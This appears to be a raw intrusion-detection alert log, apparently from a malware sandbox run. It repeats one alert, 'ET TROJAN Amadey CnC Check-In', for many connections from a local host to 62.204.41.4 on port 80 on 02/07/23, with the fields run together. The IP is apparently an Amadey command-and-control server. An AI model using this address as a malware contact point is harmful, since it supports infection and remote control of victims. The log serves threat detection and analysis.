                            192.168.2.562.204.41.450328802027700 02/07/23-19:59:56.770342TCP2027700ET TROJAN Amadey CnC Check-In5032880192.168.2.562.204.41.4
                            192.168.2.562.204.41.449709802027700 02/07/23-19:57:08.852068TCP2027700ET TROJAN Amadey CnC Check-In4970980192.168.2.562.204.41.4
                            192.168.2.562.204.41.449703802027700 02/07/23-19:57:06.000700TCP2027700ET TROJAN Amadey CnC Check-In4970380192.168.2.562.204.41.4
                            192.168.2.562.204.41.449810802027700 02/07/23-19:57:34.139598TCP2027700ET TROJAN Amadey CnC Check-In4981080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449957802027700 02/07/23-19:58:14.905022TCP2027700ET TROJAN Amadey CnC Check-In4995780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450417802027700 02/07/23-20:00:22.516624TCP2027700ET TROJAN Amadey CnC Check-In5041780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450092802027700 02/07/23-19:58:52.278298TCP2027700ET TROJAN Amadey CnC Check-In5009280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450179802027700 02/07/23-19:59:16.043396TCP2027700ET TROJAN Amadey CnC Check-In5017980192.168.2.562.204.41.4
                            192.168.2.562.204.41.449827802027700 02/07/23-19:57:38.087800TCP2027700ET TROJAN Amadey CnC Check-In4982780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450322802027700 02/07/23-19:59:55.303213TCP2027700ET TROJAN Amadey CnC Check-In5032280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450233802027700 02/07/23-19:59:31.718708TCP2027700ET TROJAN Amadey CnC Check-In5023380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450418802027700 02/07/23-20:00:22.859106TCP2027700ET TROJAN Amadey CnC Check-In5041880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450446802027700 02/07/23-20:00:29.582178TCP2027700ET TROJAN Amadey CnC Check-In5044680192.168.2.562.204.41.4
                            192.168.2.562.204.41.449929802027700 02/07/23-19:58:08.454291TCP2027700ET TROJAN Amadey CnC Check-In4992980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450286802027700 02/07/23-19:59:46.657209TCP2027700ET TROJAN Amadey CnC Check-In5028680192.168.2.562.204.41.4
                            192.168.2.562.204.41.449797802027700 02/07/23-19:57:31.010574TCP2027700ET TROJAN Amadey CnC Check-In4979780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450032802027700 02/07/23-19:58:35.551488TCP2027700ET TROJAN Amadey CnC Check-In5003280192.168.2.562.204.41.4
                            192.168.2.562.204.41.449740802027700 02/07/23-19:57:15.662783TCP2027700ET TROJAN Amadey CnC Check-In4974080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449994802027700 02/07/23-19:58:24.905756TCP2027700ET TROJAN Amadey CnC Check-In4999480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450121802027700 02/07/23-19:58:59.277722TCP2027700ET TROJAN Amadey CnC Check-In5012180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450162802027700 02/07/23-19:59:11.945539TCP2027700ET TROJAN Amadey CnC Check-In5016280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450375802027700 02/07/23-20:00:10.441776TCP2027700ET TROJAN Amadey CnC Check-In5037580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450073802027700 02/07/23-19:58:47.629161TCP2027700ET TROJAN Amadey CnC Check-In5007380192.168.2.562.204.41.4
                            192.168.2.562.204.41.449900802027700 02/07/23-19:57:59.126282TCP2027700ET TROJAN Amadey CnC Check-In4990080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449941802027700 02/07/23-19:58:11.058629TCP2027700ET TROJAN Amadey CnC Check-In4994180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450217802027700 02/07/23-19:59:27.889673TCP2027700ET TROJAN Amadey CnC Check-In5021780192.168.2.562.204.41.4
                            192.168.2.562.204.41.449953802027700 02/07/23-19:58:13.951278TCP2027700ET TROJAN Amadey CnC Check-In4995380192.168.2.562.204.41.4
                            192.168.2.562.204.41.449944802027700 02/07/23-19:58:11.828444TCP2027700ET TROJAN Amadey CnC Check-In4994480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450119802027700 02/07/23-19:58:58.794403TCP2027700ET TROJAN Amadey CnC Check-In5011980192.168.2.562.204.41.4
                            192.168.2.562.204.41.449855802027700 02/07/23-19:57:48.404554TCP2027700ET TROJAN Amadey CnC Check-In4985580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450306802027700 02/07/23-19:59:51.473442TCP2027700ET TROJAN Amadey CnC Check-In5030680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450036802027700 02/07/23-19:58:36.277046TCP2027700ET TROJAN Amadey CnC Check-In5003680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450208802027700 02/07/23-19:59:25.676246TCP2027700ET TROJAN Amadey CnC Check-In5020880192.168.2.562.204.41.4
                            192.168.2.562.204.41.449769802027700 02/07/23-19:57:21.585123TCP2027700ET TROJAN Amadey CnC Check-In4976980192.168.2.562.204.41.4
                            192.168.2.562.204.41.449938802027700 02/07/23-19:58:10.348630TCP2027700ET TROJAN Amadey CnC Check-In4993880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450220802027700 02/07/23-19:59:28.638484TCP2027700ET TROJAN Amadey CnC Check-In5022080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450401802027700 02/07/23-20:00:16.704967TCP2027700ET TROJAN Amadey CnC Check-In5040180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450391802027700 02/07/23-20:00:14.311492TCP2027700ET TROJAN Amadey CnC Check-In5039180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450303802027700 02/07/23-19:59:50.704498TCP2027700ET TROJAN Amadey CnC Check-In5030380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450045802027700 02/07/23-19:58:38.414558TCP2027700ET TROJAN Amadey CnC Check-In5004580192.168.2.562.204.41.4
                            192.168.2.562.204.41.449883802027700 02/07/23-19:57:54.965082TCP2027700ET TROJAN Amadey CnC Check-In4988380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450051802027700 02/07/23-19:58:39.861264TCP2027700ET TROJAN Amadey CnC Check-In5005180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450299802027700 02/07/23-19:59:49.758751TCP2027700ET TROJAN Amadey CnC Check-In5029980192.168.2.562.204.41.4
                            192.168.2.562.204.41.449916802027700 02/07/23-19:58:03.032699TCP2027700ET TROJAN Amadey CnC Check-In4991680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450134802027700 02/07/23-19:59:04.959509TCP2027700ET TROJAN Amadey CnC Check-In5013480192.168.2.562.204.41.4
                            192.168.2.562.204.41.449785802027700 02/07/23-19:57:28.117998TCP2027700ET TROJAN Amadey CnC Check-In4978580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450388802027700 02/07/23-20:00:13.583065TCP2027700ET TROJAN Amadey CnC Check-In5038880192.168.2.562.204.41.4
                            192.168.2.562.204.41.449972802027700 02/07/23-19:58:18.490991TCP2027700ET TROJAN Amadey CnC Check-In4997280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450106802027700 02/07/23-19:58:55.697715TCP2027700ET TROJAN Amadey CnC Check-In5010680192.168.2.562.204.41.4
                            192.168.2.562.204.41.449966802027700 02/07/23-19:58:17.026384TCP2027700ET TROJAN Amadey CnC Check-In4996680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450420802027700 02/07/23-20:00:23.363085TCP2027700ET TROJAN Amadey CnC Check-In5042080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450017802027700 02/07/23-19:58:31.793987TCP2027700ET TROJAN Amadey CnC Check-In5001780192.168.2.562.204.41.4
                            192.168.2.562.204.41.449712802027700 02/07/23-19:57:09.572156TCP2027700ET TROJAN Amadey CnC Check-In4971280192.168.2.562.204.41.4
                            192.168.2.562.204.41.449801802027700 02/07/23-19:57:31.978610TCP2027700ET TROJAN Amadey CnC Check-In4980180192.168.2.562.204.41.4
                            192.168.2.562.204.41.449925802027700 02/07/23-19:58:07.476078TCP2027700ET TROJAN Amadey CnC Check-In4992580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450236802027700 02/07/23-19:59:32.439969TCP2027700ET TROJAN Amadey CnC Check-In5023680192.168.2.562.204.41.4
                            192.168.2.562.204.41.449842802027700 02/07/23-19:57:41.717333TCP2027700ET TROJAN Amadey CnC Check-In4984280192.168.2.562.204.41.4
                            192.168.2.562.204.41.449753802027700 02/07/23-19:57:18.413042TCP2027700ET TROJAN Amadey CnC Check-In4975380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450331802027700 02/07/23-19:59:57.512462TCP2027700ET TROJAN Amadey CnC Check-In5033180192.168.2.562.204.41.4
                            192.168.2.562.204.41.449699802027700 02/07/23-19:57:03.880243TCP2027700ET TROJAN Amadey CnC Check-In4969980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450372802027700 02/07/23-20:00:09.704797TCP2027700ET TROJAN Amadey CnC Check-In5037280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450461802027700 02/07/23-20:00:32.989437TCP2027700ET TROJAN Amadey CnC Check-In5046180192.168.2.562.204.41.4
                            192.168.2.562.204.41.449772802027700 02/07/23-19:57:22.305855TCP2027700ET TROJAN Amadey CnC Check-In4977280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450188802027700 02/07/23-19:59:18.207900TCP2027700ET TROJAN Amadey CnC Check-In5018880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450023802027700 02/07/23-19:58:33.280642TCP2027700ET TROJAN Amadey CnC Check-In5002380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450064802027700 02/07/23-19:58:44.287580TCP2027700ET TROJAN Amadey CnC Check-In5006480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450277802027700 02/07/23-19:59:44.403140TCP2027700ET TROJAN Amadey CnC Check-In5027780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450319802027700 02/07/23-19:59:54.594853TCP2027700ET TROJAN Amadey CnC Check-In5031980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450147802027700 02/07/23-19:59:08.302721TCP2027700ET TROJAN Amadey CnC Check-In5014780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450151802027700 02/07/23-19:59:09.287465TCP2027700ET TROJAN Amadey CnC Check-In5015180192.168.2.562.204.41.4
                            192.168.2.562.204.41.449979802027700 02/07/23-19:58:20.181959TCP2027700ET TROJAN Amadey CnC Check-In4997980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450439802027700 02/07/23-20:00:27.911911TCP2027700ET TROJAN Amadey CnC Check-In5043980192.168.2.562.204.41.4
                            192.168.2.562.204.41.449921802027700 02/07/23-19:58:04.595004TCP2027700ET TROJAN Amadey CnC Check-In4992180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450390802027700 02/07/23-20:00:14.048984TCP2027700ET TROJAN Amadey CnC Check-In5039080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450068802027700 02/07/23-19:58:46.433814TCP2027700ET TROJAN Amadey CnC Check-In5006880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450424802027700 02/07/23-20:00:24.325922TCP2027700ET TROJAN Amadey CnC Check-In5042480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450246802027700 02/07/23-19:59:34.827639TCP2027700ET TROJAN Amadey CnC Check-In5024680192.168.2.562.204.41.4
                            192.168.2.562.204.41.449743802027700 02/07/23-19:57:16.382887TCP2027700ET TROJAN Amadey CnC Check-In4974380192.168.2.562.204.41.4
                            192.168.2.562.204.41.449771802027700 02/07/23-19:57:22.069473TCP2027700ET TROJAN Amadey CnC Check-In4977180192.168.2.562.204.41.4
                            192.168.2.562.204.41.449899802027700 02/07/23-19:57:58.885147TCP2027700ET TROJAN Amadey CnC Check-In4989980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450301802027700 02/07/23-19:59:50.234623TCP2027700ET TROJAN Amadey CnC Check-In5030180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450279802027700 02/07/23-19:59:44.920542TCP2027700ET TROJAN Amadey CnC Check-In5027980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450010802027700 02/07/23-19:58:30.047946TCP2027700ET TROJAN Amadey CnC Check-In5001080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450362802027700 02/07/23-20:00:07.266629TCP2027700ET TROJAN Amadey CnC Check-In5036280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450123802027700 02/07/23-19:58:59.760627TCP2027700ET TROJAN Amadey CnC Check-In5012380192.168.2.562.204.41.4
                            192.168.2.562.204.41.449838802027700 02/07/23-19:57:40.748973TCP2027700ET TROJAN Amadey CnC Check-In4983880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450184802027700 02/07/23-19:59:17.230713TCP2027700ET TROJAN Amadey CnC Check-In5018480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450380802027700 02/07/23-20:00:11.655903TCP2027700ET TROJAN Amadey CnC Check-In5038080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450457802027700 02/07/23-20:00:31.981578TCP2027700ET TROJAN Amadey CnC Check-In5045780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450105802027700 02/07/23-19:58:55.457749TCP2027700ET TROJAN Amadey CnC Check-In5010580192.168.2.562.204.41.4
                            192.168.2.562.204.41.449700802027700 02/07/23-19:57:04.269931TCP2027700ET TROJAN Amadey CnC Check-In4970080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449856802027700 02/07/23-19:57:48.633799TCP2027700ET TROJAN Amadey CnC Check-In4985680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450429802027700 02/07/23-20:00:25.500722TCP2027700ET TROJAN Amadey CnC Check-In5042980192.168.2.562.204.41.4
                            192.168.2.562.204.41.449833802027700 02/07/23-19:57:39.543463TCP2027700ET TROJAN Amadey CnC Check-In4983380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450297802027700 02/07/23-19:59:49.266256TCP2027700ET TROJAN Amadey CnC Check-In5029780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450452802027700 02/07/23-20:00:31.039414TCP2027700ET TROJAN Amadey CnC Check-In5045280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450334802027700 02/07/23-19:59:58.221791TCP2027700ET TROJAN Amadey CnC Check-In5033480192.168.2.562.204.41.4
                            192.168.2.562.204.41.449874802027700 02/07/23-19:57:52.779348TCP2027700ET TROJAN Amadey CnC Check-In4987480192.168.2.562.204.41.4
                            192.168.2.562.204.41.449894802027700 02/07/23-19:57:57.677143TCP2027700ET TROJAN Amadey CnC Check-In4989480192.168.2.562.204.41.4
                            192.168.2.562.204.41.449911802027700 02/07/23-19:58:01.794028TCP2027700ET TROJAN Amadey CnC Check-In4991180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450274802027700 02/07/23-19:59:42.509237TCP2027700ET TROJAN Amadey CnC Check-In5027480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450256802027700 02/07/23-19:59:37.251534TCP2027700ET TROJAN Amadey CnC Check-In5025680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450078802027700 02/07/23-19:58:48.869935TCP2027700ET TROJAN Amadey CnC Check-In5007880192.168.2.562.204.41.4
                            192.168.2.562.204.41.449715802027700 02/07/23-19:57:10.319689TCP2027700ET TROJAN Amadey CnC Check-In4971580192.168.2.562.204.41.4
                            192.168.2.562.204.41.449733802027700 02/07/23-19:57:13.945819TCP2027700ET TROJAN Amadey CnC Check-In4973380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450096802027700 02/07/23-19:58:53.262318TCP2027700ET TROJAN Amadey CnC Check-In5009680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450352802027700 02/07/23-20:00:04.891222TCP2027700ET TROJAN Amadey CnC Check-In5035280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450156802027700 02/07/23-19:59:10.481824TCP2027700ET TROJAN Amadey CnC Check-In5015680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450228802027700 02/07/23-19:59:30.531227TCP2027700ET TROJAN Amadey CnC Check-In5022880192.168.2.562.204.41.4
                            192.168.2.562.204.41.449805802027700 02/07/23-19:57:32.928581TCP2027700ET TROJAN Amadey CnC Check-In4980580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450447802027700 02/07/23-20:00:29.817138TCP2027700ET TROJAN Amadey CnC Check-In5044780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450406802027700 02/07/23-20:00:17.910532TCP2027700ET TROJAN Amadey CnC Check-In5040680192.168.2.562.204.41.4
                            192.168.2.562.204.41.449710802027700 02/07/23-19:57:09.099241TCP2027700ET TROJAN Amadey CnC Check-In4971080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450115802027700 02/07/23-19:58:57.838937TCP2027700ET TROJAN Amadey CnC Check-In5011580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450311802027700 02/07/23-19:59:52.679367TCP2027700ET TROJAN Amadey CnC Check-In5031180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450133802027700 02/07/23-19:59:03.417426TCP2027700ET TROJAN Amadey CnC Check-In5013380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450174802027700 02/07/23-19:59:14.839891TCP2027700ET TROJAN Amadey CnC Check-In5017480192.168.2.562.204.41.4
                            192.168.2.562.204.41.449828802027700 02/07/23-19:57:38.323716TCP2027700ET TROJAN Amadey CnC Check-In4982880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450027802027700 02/07/23-19:58:34.302753TCP2027700ET TROJAN Amadey CnC Check-In5002780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450284802027700 02/07/23-19:59:46.139610TCP2027700ET TROJAN Amadey CnC Check-In5028480192.168.2.562.204.41.4
                            192.168.2.562.204.41.449846802027700 02/07/23-19:57:42.696965TCP2027700ET TROJAN Amadey CnC Check-In4984680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450462802027700 02/07/23-20:00:33.222235TCP2027700ET TROJAN Amadey CnC Check-In5046280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450205802027700 02/07/23-19:59:23.312322TCP2027700ET TROJAN Amadey CnC Check-In5020580192.168.2.562.204.41.4
                            192.168.2.562.204.41.449705802027700 02/07/23-19:57:06.909903TCP2027700ET TROJAN Amadey CnC Check-In4970580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450321802027700 02/07/23-19:59:55.064377TCP2027700ET TROJAN Amadey CnC Check-In5032180192.168.2.562.204.41.4
                            192.168.2.562.204.41.449962802027700 02/07/23-19:58:16.087938TCP2027700ET TROJAN Amadey CnC Check-In4996280192.168.2.562.204.41.4
                            192.168.2.562.204.41.449990802027700 02/07/23-19:58:22.962299TCP2027700ET TROJAN Amadey CnC Check-In4999080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450113802027700 02/07/23-19:58:57.370709TCP2027700ET TROJAN Amadey CnC Check-In5011380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450465802027700 02/07/23-20:00:33.942201TCP2027700ET TROJAN Amadey CnC Check-In5046580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450287802027700 02/07/23-19:59:46.895270TCP2027700ET TROJAN Amadey CnC Check-In5028780192.168.2.562.204.41.4
                            192.168.2.562.204.41.449702802027700 02/07/23-19:57:05.106586TCP2027700ET TROJAN Amadey CnC Check-In4970280192.168.2.562.204.41.4
                            192.168.2.562.204.41.449730802027700 02/07/23-19:57:13.243832TCP2027700ET TROJAN Amadey CnC Check-In4973080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449876802027700 02/07/23-19:57:53.245417TCP2027700ET TROJAN Amadey CnC Check-In4987680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450143802027700 02/07/23-19:59:07.357882TCP2027700ET TROJAN Amadey CnC Check-In5014380192.168.2.562.204.41.4
                            192.168.2.562.204.41.449818802027700 02/07/23-19:57:36.123767TCP2027700ET TROJAN Amadey CnC Check-In4981880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450146802027700 02/07/23-19:59:08.058254TCP2027700ET TROJAN Amadey CnC Check-In5014680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450437802027700 02/07/23-20:00:27.438497TCP2027700ET TROJAN Amadey CnC Check-In5043780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450434802027700 02/07/23-20:00:26.717538TCP2027700ET TROJAN Amadey CnC Check-In5043480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450324802027700 02/07/23-19:59:55.796737TCP2027700ET TROJAN Amadey CnC Check-In5032480192.168.2.562.204.41.4
                            192.168.2.562.204.41.449989802027700 02/07/23-19:58:22.562862TCP2027700ET TROJAN Amadey CnC Check-In4998980192.168.2.562.204.41.4
                            192.168.2.562.204.41.449871802027700 02/07/23-19:57:52.296229TCP2027700ET TROJAN Amadey CnC Check-In4987180192.168.2.562.204.41.4
                            192.168.2.562.204.41.449897802027700 02/07/23-19:57:58.416673TCP2027700ET TROJAN Amadey CnC Check-In4989780192.168.2.562.204.41.4
                            192.168.2.562.204.41.449815802027700 02/07/23-19:57:35.404124TCP2027700ET TROJAN Amadey CnC Check-In4981580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450426802027700 02/07/23-20:00:24.801297TCP2027700ET TROJAN Amadey CnC Check-In5042680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450100802027700 02/07/23-19:58:54.228469TCP2027700ET TROJAN Amadey CnC Check-In5010080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449807802027700 02/07/23-19:57:33.429668TCP2027700ET TROJAN Amadey CnC Check-In4980780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450098802027700 02/07/23-19:58:53.748513TCP2027700ET TROJAN Amadey CnC Check-In5009880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450360802027700 02/07/23-20:00:06.784027TCP2027700ET TROJAN Amadey CnC Check-In5036080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450409802027700 02/07/23-20:00:18.614092TCP2027700ET TROJAN Amadey CnC Check-In5040980192.168.2.562.204.41.4
                            192.168.2.562.204.41.449848802027700 02/07/23-19:57:43.671762TCP2027700ET TROJAN Amadey CnC Check-In4984880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450141802027700 02/07/23-19:59:06.885723TCP2027700ET TROJAN Amadey CnC Check-In5014180192.168.2.562.204.41.4
                            192.168.2.562.204.41.449784802027700 02/07/23-19:57:27.871680TCP2027700ET TROJAN Amadey CnC Check-In4978480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450182802027700 02/07/23-19:59:16.745810TCP2027700ET TROJAN Amadey CnC Check-In5018280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450218802027700 02/07/23-19:59:28.144912TCP2027700ET TROJAN Amadey CnC Check-In5021880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450259802027700 02/07/23-19:59:37.982209TCP2027700ET TROJAN Amadey CnC Check-In5025980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450389802027700 02/07/23-20:00:13.814637TCP2027700ET TROJAN Amadey CnC Check-In5038980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450289802027700 02/07/23-19:59:47.359030TCP2027700ET TROJAN Amadey CnC Check-In5028980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450000802027700 02/07/23-19:58:27.513822TCP2027700ET TROJAN Amadey CnC Check-In5000080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449889802027700 02/07/23-19:57:56.483664TCP2027700ET TROJAN Amadey CnC Check-In4988980192.168.2.562.204.41.4
                            192.168.2.562.204.41.449713802027700 02/07/23-19:57:09.809088TCP2027700ET TROJAN Amadey CnC Check-In4971380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450041802027700 02/07/23-19:58:37.467492TCP2027700ET TROJAN Amadey CnC Check-In5004180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450118802027700 02/07/23-19:58:58.558092TCP2027700ET TROJAN Amadey CnC Check-In5011880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450171802027700 02/07/23-19:59:14.125363TCP2027700ET TROJAN Amadey CnC Check-In5017180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450467802027700 02/07/23-20:00:34.410744TCP2027700ET TROJAN Amadey CnC Check-In5046780192.168.2.562.204.41.4
                            192.168.2.562.204.41.449843802027700 02/07/23-19:57:41.966115TCP2027700ET TROJAN Amadey CnC Check-In4984380192.168.2.562.204.41.4
                            192.168.2.562.204.41.449884802027700 02/07/23-19:57:55.199529TCP2027700ET TROJAN Amadey CnC Check-In4988480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450248802027700 02/07/23-19:59:35.309770TCP2027700ET TROJAN Amadey CnC Check-In5024880192.168.2.562.204.41.4
                            192.168.2.562.204.41.449881802027700 02/07/23-19:57:54.464877TCP2027700ET TROJAN Amadey CnC Check-In4988180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450154802027700 02/07/23-19:59:10.010091TCP2027700ET TROJAN Amadey CnC Check-In5015480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450243802027700 02/07/23-19:59:34.125339TCP2027700ET TROJAN Amadey CnC Check-In5024380192.168.2.562.204.41.4
                            192.168.2.562.204.41.449970802027700 02/07/23-19:58:17.986268TCP2027700ET TROJAN Amadey CnC Check-In4997080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450332802027700 02/07/23-19:59:57.750216TCP2027700ET TROJAN Amadey CnC Check-In5033280192.168.2.562.204.41.4
                            192.168.2.562.204.41.449774802027700 02/07/23-19:57:22.791511TCP2027700ET TROJAN Amadey CnC Check-In4977480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450047802027700 02/07/23-19:58:38.899810TCP2027700ET TROJAN Amadey CnC Check-In5004780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450399802027700 02/07/23-20:00:16.236683TCP2027700ET TROJAN Amadey CnC Check-In5039980192.168.2.562.204.41.4
                            192.168.2.562.204.41.449835802027700 02/07/23-19:57:40.026952TCP2027700ET TROJAN Amadey CnC Check-In4983580192.168.2.562.204.41.4
                            192.168.2.562.204.41.449924802027700 02/07/23-19:58:07.066105TCP2027700ET TROJAN Amadey CnC Check-In4992480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450065802027700 02/07/23-19:58:45.626874TCP2027700ET TROJAN Amadey CnC Check-In5006580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450019802027700 02/07/23-19:58:32.292789TCP2027700ET TROJAN Amadey CnC Check-In5001980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450365802027700 02/07/23-20:00:08.016119TCP2027700ET TROJAN Amadey CnC Check-In5036580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450215802027700 02/07/23-19:59:27.402726TCP2027700ET TROJAN Amadey CnC Check-In5021580192.168.2.562.204.41.4
                            192.168.2.562.204.41.449746802027700 02/07/23-19:57:17.135800TCP2027700ET TROJAN Amadey CnC Check-In4974680192.168.2.562.204.41.4
                            192.168.2.562.204.41.449942802027700 02/07/23-19:58:11.343155TCP2027700ET TROJAN Amadey CnC Check-In4994280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450108802027700 02/07/23-19:58:56.182131TCP2027700ET TROJAN Amadey CnC Check-In5010880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450304802027700 02/07/23-19:59:50.968034TCP2027700ET TROJAN Amadey CnC Check-In5030480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450187802027700 02/07/23-19:59:17.949465TCP2027700ET TROJAN Amadey CnC Check-In5018780192.168.2.562.204.41.4
                            192.168.2.562.204.41.449853802027700 02/07/23-19:57:47.844021TCP2027700ET TROJAN Amadey CnC Check-In4985380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450454802027700 02/07/23-20:00:31.504096TCP2027700ET TROJAN Amadey CnC Check-In5045480192.168.2.562.204.41.4
                            192.168.2.562.204.41.449764802027700 02/07/23-19:57:20.603429TCP2027700ET TROJAN Amadey CnC Check-In4976480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450031802027700 02/07/23-19:58:35.304361TCP2027700ET TROJAN Amadey CnC Check-In5003180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450383802027700 02/07/23-20:00:12.387972TCP2027700ET TROJAN Amadey CnC Check-In5038380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450120802027700 02/07/23-19:58:59.032260TCP2027700ET TROJAN Amadey CnC Check-In5012080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450276802027700 02/07/23-19:59:43.973222TCP2027700ET TROJAN Amadey CnC Check-In5027680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450126802027700 02/07/23-19:59:00.503245TCP2027700ET TROJAN Amadey CnC Check-In5012680192.168.2.562.204.41.4
                            192.168.2.562.204.41.449952802027700 02/07/23-19:58:13.723295TCP2027700ET TROJAN Amadey CnC Check-In4995280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450037802027700 02/07/23-19:58:36.516957TCP2027700ET TROJAN Amadey CnC Check-In5003780192.168.2.562.204.41.4
                            192.168.2.562.204.41.449958802027700 02/07/23-19:58:15.137846TCP2027700ET TROJAN Amadey CnC Check-In4995880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450003802027700 02/07/23-19:58:28.269253TCP2027700ET TROJAN Amadey CnC Check-In5000380192.168.2.562.204.41.4
                            192.168.2.562.204.41.449863802027700 02/07/23-19:57:50.367777TCP2027700ET TROJAN Amadey CnC Check-In4986380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450192802027700 02/07/23-19:59:19.202750TCP2027700ET TROJAN Amadey CnC Check-In5019280192.168.2.562.204.41.4
